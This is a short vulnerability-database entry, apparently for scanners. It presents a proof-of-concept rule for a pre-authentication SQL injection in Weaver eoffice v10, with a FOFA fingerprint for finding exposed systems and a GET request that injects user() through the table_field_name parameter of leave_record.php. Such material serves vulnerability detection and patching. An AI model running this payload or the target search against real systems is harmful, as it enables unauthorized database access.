e-office-v10-sql-inject: 泛微 eoffice v10 前台 SQL 注入

2025-08-01 泛微eoffice v10 PoC Public

Description

fofa: fid="2csJpuWtfTdSAavIfJTuBw=="

进一步利用/验证方法,参考下面 reference 链接

PoC

id: e-office-v10-sql-inject

info:
  name: 泛微 eoffice v10 前台 SQL 注入
  author: 你是猪
  severity: high
  description: |
    fofa: fid="2csJpuWtfTdSAavIfJTuBw=="
    进一步利用/验证方法,参考下面 reference 链接
  reference:
    - https://www.hedysx.com/2777.html
  tags: ecology,sqli
  created: 2024/02/21

rules:
  r0:
    request:
      method: GET
      path: /eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10
    expression: response.status == 200 && response.body.bcontains(b'<p>未找到相关数据</p>')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities